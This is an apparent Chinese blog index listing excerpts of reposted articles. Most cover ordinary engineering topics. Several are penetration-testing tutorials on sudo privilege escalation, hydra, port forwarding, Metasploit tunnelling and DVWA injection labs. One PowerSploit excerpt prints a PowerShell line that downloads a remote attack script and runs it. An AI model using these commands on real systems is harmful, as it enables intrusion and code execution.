自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(4333)
  • 收藏
  • 关注

转载 C# MVC MVP

https://www.codeproject.com/Articles/613682/Your-first-program-using-MVC-pattern-with-Csharp-Whttps://www.codeproject.com/Articles/522809/WinForms-MVP-An-MVP-Framework-for-WinForms转载于:https:/...

2019-09-25 17:21:00 137

转载 SolidWorks学习笔记9 自顶向下方法

目的:制作一个轴承。先创建一个零件作为一级控件,(草图)如下,是轴承的横截面。创建内环。新建一个零件,然后选择插入=》零件,选择“一级控件”零件创建卡环,插入零件,选择一级控件然后再旋转切除,再阵列同理创建外环和滚珠。创建装配体。因为这些零件公用一个“一级控件”。所以装配的时候直接确定即...

2019-09-20 11:38:00 632

转载 SUDO_KILLER可以帮助你识别并利用错误的Sudo规则与配置

工具概述SUDO_KILLER这款工具可以帮助我们通过多种渠道利用SUDO来在Linux环境下实现提权。该工具能够识别目标操作系统版本,并发现环境中sudo规则的错误配置、安全漏洞,以及不安全的代码,而研究人员就可以利用SUDO_KILLER所提供的功能来将权限提升为ROOT权限。SUDO_KILLER将提供一份命令列表或本地漏洞利用信息,以帮助研究人员实现提权。需要注意的是,该...

2019-09-19 14:20:00 132

转载 [19/09/16-星期一] Python的运算符和条件判断语句

一、运算符(1)算术运算符  + 加法运算符(如果是两个字符串之间进行加法运算,则会进行拼串操作)      a = 10 + 5   计算      a = 'hello' + ' ' + 'world'   拼串  - 减法运算符      a = 10 - 5   计算      a = 5 - True  bool型也是int型,没有错误,输...

2019-09-16 18:51:00 139

转载 小米平板4-点击usb传输文件电脑还是找不到平板盘符(需要调出开发者选项及步骤)...

问题:小米平板4,插上数据线,点击usb传输文件。但是电脑还是找不到平板盘符。如下图:解决方案:经过查询,在小米平板 没调出 开发者模式之前,直接用USB直接连接PC是无法互相传输文件的。每次传输数据都忘记。这次记一下。调出开发者选项及步骤:1,我的设备中,找到全部参数。点击进入。如下图:2,在MIUI版本,连续点击3次。...

2019-09-14 22:23:00 2842

转载 dirb参数解析

-----------------DIRB v2.22 By The Dark Raver-----------------dirb <url_base> [<wordlist_file(s)>] [options]========================= NOTES ========================= <url_ba...

2019-09-14 22:01:00 4025

转载 SolidWorks学习笔记8 包覆,圆顶

包覆在该平面上创建草图,点击A,创建文字在左侧取消勾选“使用文档字体”,点击字体,重新设置高度,字体。在草图上点击来放置。点击特征-》包覆,在模型树中选择有文字的草图这里面 选择圆柱侧面最终效果图圆顶特征概念:从选择的平面 平滑过渡到指定距离的点。选择特征-》圆顶...

2019-09-11 09:14:00 463

转载 openshift 3.11安装部署

openshift 3.11 安装部署openshift安装部署1 环境准备(所有节点)openshift 版本 v3.111.1 机器环境ip cpu mem hostname OSsystem192.168.1.130 4 16 master  CentOS7.6192.168.1...

2019-09-09 17:03:00 1229

转载 [19/09/08-星期日] Python的几个概念和语法

一、表达式、语句、程序、函数  1、表达式  就是一个类似于数学公式的东西 ,比如:10 + 5 8 - 4;表达式一般仅仅用了计算一些结果,不会对程序产生实质性的影响        如果在交互模式中输入一个表达式,解释器会自动将表达式的结果输出  2、语句  在程序中语句一般需要完成某种功能,比如打印信息、获取信息、为变量赋值。如:print()、input()、a=10...

2019-09-08 20:49:00 93

转载 springboot学习链接

https://github.com/wuyouzhuguli/SpringAll转载于:https://www.cnblogs.com/Baronboy/p/11483069.html

2019-09-07 21:08:00 42

转载 Thinkpad 系列电脑,装win10无限卡死在登录界面 解决方案及bug report!

除了标题的描述外,此方法还适用于:1. 电脑 (主要还是以 Thinkpad 系列电脑 为主)win7 升级win 10 失败,用各种洁净方法 安装纯净版也失败。2. 电脑安装Win10系统,重启后一直卡在 “准备就绪”阶段,直到卡死。(也就是 屏幕中的圈 卡死不转了)2. 电脑安装Win10系统,重启后一直卡在“ 海内存知己,天涯若比邻 ” 界面,直到卡死。(也就是 屏幕...

2019-09-07 04:37:00 4190

转载 字符串后#号导致导出excel换行问题

BSIK表中项目文本末尾加了#号,导致报表导出时项目文本的字段换行https://blog.csdn.net/youtobe2008/article/details/9748747转载于:https://www.cnblogs.com/CtrlS/p/11474834.html...

2019-09-06 14:55:00 32

转载 [19/09/02-星期一] 基础知识_Python入门

一、计算机基础  用户界面:TUI-文本交互界面; GUI-图形化交互界面  命令行:就是一种文本交互界面,可以使用一个一个的指令来操作计算机。任何计算机的操作系统都包含命令行(Windows、Linux、macOS)。      有多个名字,如命令行,命令行窗口,命令行提示符,cmd,shell、终端、Terminal(末端,终端)。      常见命令:(方向键上下,...

2019-09-04 18:38:00 953

转载 mongodb为什么比mysql效率高

首先是内存映射机制,数据不是持久化到存储设备中的,而是暂时存储在内存中,这就提高了在IO上效率以及操作系统对存储介质之间的性能损耗。(毕竟内存读取最快)其次,NoSQL并不是不使用sql,只是不使用关系。没有关系的存在,就表示每个数据都好比是拥有一个单独的存储空间,然后一个聚集索引来指向。搜索性能一定会提高的。第三,语言。使用javascript语法进行操作更加高效、直接。这些是Mong...

2019-09-03 23:46:00 217

转载 SpringMVC源码分析和启动流程

https://yq.aliyun.com/articles/707995在Spring的web容器启动时会去读取web.xml文件,相关启动顺序为:<context-param> --> <listener> --> <filter> --> <servlet>,具体为:1、解析<context-...

2019-09-03 23:43:00 52

转载 如何解决高并发,秒杀问题

相信不少人会被这个问题困扰,分享大家一篇这样的文章,希望能够帮到你!一、秒杀业务为什么难做?1)im系统,例如qq或者微博,每个人都读自己的数据(好友列表、群列表、个人信息);2)微博系统,每个人读你关注的人的数据,一个人读多个人的数据;3)秒杀系统,库存只有一份,所有人会在集中的时间读和写这些数据,多个人读一个数据。例如:小米手机每周二的秒杀,可能手机只有1万部,但瞬时进入的...

2019-09-03 23:04:00 44

转载 内网Metasploit映射到外网

下载frpGithub项目地址:https://github.com/fatedier/frp找到最新的releases下载,系统版本自行确认。下载方法:wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gztar zxvf frp_0...

2019-09-03 17:06:00 971

转载 SolidWorks学习笔记7 镜像,阵列

镜像将特征,面,实体相对于一个平面来复制。修改原来的特征,镜像特征随之改变阵列线性阵列,在左侧,先激活要阵列的特征,然后点击小柱然后选择方向1和方向2,该方向的阵列距离和数量(一般使用边线作为方向),如果对于位置,不要实例,可以激活可以跳过的实例,然后选择不要的圆周阵列...

2019-09-03 12:30:00 571

转载 设备驱动器中的百度网盘标志怎么删除?

这是我第N次要删除 设备驱动器中的百度网盘标志。我觉得我有必要记录一下了。每次百度网盘更新,曾经设备驱动器中删除的百度网盘图标就又复生了。真是删除删不尽,更新后又生。每到这个时候,不免心中就有句,MMP 不知道当讲不当讲。百度肯定会在心里说,腾讯也是流氓,我们都是根据腾讯学习的。腾讯视频每次更新后,也会增加腾讯视频图标。但是人家图标右键是可以删除的。百度的却不可以删除!这...

2019-09-02 15:47:00 3789

转载 powersploit使用实例

一、AntivirusBypass(绕过杀毒)Find-AVSignature 发现杀软的签名1、先在靶机(windows 2008)上远程加载位于win7的Invoke-Shellcode.ps1脚本iex(New-Object Net.WebClient).DownloadString("http://10.10.10.187/PowerSploit-master/A...

2019-08-30 15:39:00 195

转载 powersploit简介

一、PowerSploit简介PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。Powershell的优点:1.代码运行在内存中可以不去接触磁盘2.从另一个系统中下载代码并执行3.很多安全产品并不能监测到powershell的活动4.cmd.exe通常被阻止运行,但是...

2019-08-30 15:25:00 483

转载 Metersploit系统参数说明

Back参数Back参数主要⽤用于返回。⽐比如你进⼊入了了某⼀一个漏漏洞洞模块的设置,但是你想再重新选择一个漏漏洞洞模块,那么就需要⽤用到back参数。这张图说明,才开始我使用了ms08_067_netapi的利用模块,之后使⽤了back参数返回。Banner参数这个主要是查看metasploit的版本信息,利利⽤用模块数量量、payload数量量等等。...

2019-08-30 15:14:00 543

转载 springboot 极简使用例子: redis,MySql数据库,日志,netty

配置创建项目的时候选择application.yml内容如下spring: redis: host: 127.0.0.1 port: 6379 database: 0 datasource: driver-class-name: com.mysql.cj.jdbc.Driver url: jdbc...

2019-08-27 16:33:00 200

转载 nmap中文手册

译注该Nmap参考指南中文版由Fei Yang <fyang1024@gmail.com>和Lei Li<lilei_721@6611.org> 从英文版本翻译而来。 我们希望这将使全世界使用中文的人们更了解Nmap,但我们不能保证该译本和官方的 英文版本一样完整,也不能保证同步更新。 它可以在Creative Commons Attribution Licens...

2019-08-27 15:10:00 913

转载 hydra 常用命令解析

参数说明:Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C...

2019-08-27 09:26:00 1033

转载 数据库知识扩展

1.原子性是如何实现的为了实现原子性,需要通过日志:将所有对数据的更新操作都写入日志,如果一个事务中的一部分操作已经成功,但以后的操作,由于断电/系统崩溃/其它的软硬件错误而无法继续,则通过回溯日志,将已经执行成功的操作撤销,从而达到“全部操作失败”的目的。最常见的场景是,数据库系统崩溃后重启,此时数据库处于不一致的状态,必须先执行一个crash recovery的过程:读取日志进行...

2019-08-26 09:40:00 97

转载 chentos7 安装jdk1.8(二进制安装)

首先下载jdk1.8 去官网下载jdk:http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html 解压到指定的目录 解压命令 #解压压缩包[yuyongxr@instance-2 ~] tar -zxvf jdk-8u221-linux-x64.tar.gz #...

2019-08-22 16:14:00 134

转载 SpringCloud各个组件通俗解析

https://www.cnblogs.com/lonelyJay/p/9936241.html转载于:https://www.cnblogs.com/Baronboy/p/11391896.html

2019-08-21 23:18:00 80

转载 端口转发之 nc

nc使用方法:Ncat 7.50 ( https://nmap.org/ncat )Usage: ncat [options] [hostname] [port]Options taking a time assume seconds. Append 'ms' for milliseconds,'s' for seconds, 'm' for minutes, o...

2019-08-21 11:36:00 612

转载 端口转发之 lcx

lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmapWindows版使用方法如下:lcx有两大功能:1)端口转发(listen和slave成对使用)2)端口映射(tran)1、lcx 内网端口转发(1)、内网主机上执行:lcx.exe –slave 公网主机i...

2019-08-21 11:08:00 206

转载 前n项和!

就当是练习了(各种高精度)!综合很强!View Code #include"iostream"#define M 1010using namespace std;char ch1[M],ch2[M];int a[M],b[M];int c[M],d[M];int num[M];int sum[M];int W[M];int H[M];int t,k,g,v;int i,j;i...

2019-08-21 02:59:11 442

转载 DVWA SQL Injection 通关教程

SQL Injection,即SQL注入,SQLi,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害巨大,常常会导致整个数据库被“脱裤”,如今SQL注入仍是现在最常见的Web漏洞之一。SQL 注入分类:按SQLMap中的分类来看,SQL注入类型有以下5种:UNION query SQL injection...

2019-08-20 14:16:00 1288

转载 DVWA SQL Injection(Blind) 通关教程

SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注思路手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“...

2019-08-20 14:06:00 228

转载 VM7 下面 让Linux(转载)

1.网上邻居-属性-可以看到在你安装好 VM虚拟机后又多了两个网络连接 (vmnet1是host-only,也就是说,选择用vmnet1的话就相当于VMware给你提供了一个虚拟交换机,仅将虚拟机和真实系统连上 了,虚拟机可以与真实系统相互共享文件,但是虚拟机无法访问外部互联网,而vmnet8是NAT,就是网络地址转换,相当于给你一个虚拟交换机,将虚拟机 和真实系统连上去了,...

2019-08-20 12:54:41 92

转载 DVWA Command Injection 通关教程

Command Injection 介绍命令注入(Command Injection),对一些函数的参数没有做过滤或过滤不严导致的,可以执行系统或者应用指令(CMD命令或者bash命令)的一种注入攻击手段。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一。判断命令注入流程是否调用系统命令函数或函数的参数是否可控是否拼接注入命令命令连接符c...

2019-08-20 11:08:00 166

转载 DVWA File Upload 通关教程

File Upload,即文件上传。文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。先看常规的文件上传操作:客户端上传:<html><head><meta http-equiv="Content-Type" co...

2019-08-20 10:48:00 442

转载 DVWA XSS (Reflected) 通关教程

XSS 介绍XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSS。DOM型的XSS由于其特殊...

2019-08-20 10:36:00 426

转载 DVWA XSS (Stored) 通关教程

Stored Cross Site Scripting存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。Low Security LevelDVWA XSS (Stored) 通关教程W...

2019-08-20 10:25:00 1054

转载 杭电acm2099

整除的尾数Time Limit: 1000/1000 MS (Java/Others)Memory Limit: 32768/32768 K (Java/Others)Total Submission(s): 17173Accepted Submission(s): 7176Problem Description一个整数,只知道前几位,不知道末二位,被另一个整...

2019-08-20 10:18:20 73

转载 DVWA XSS (DOM) 通关教程

DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元...

2019-08-20 10:06:00 959

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除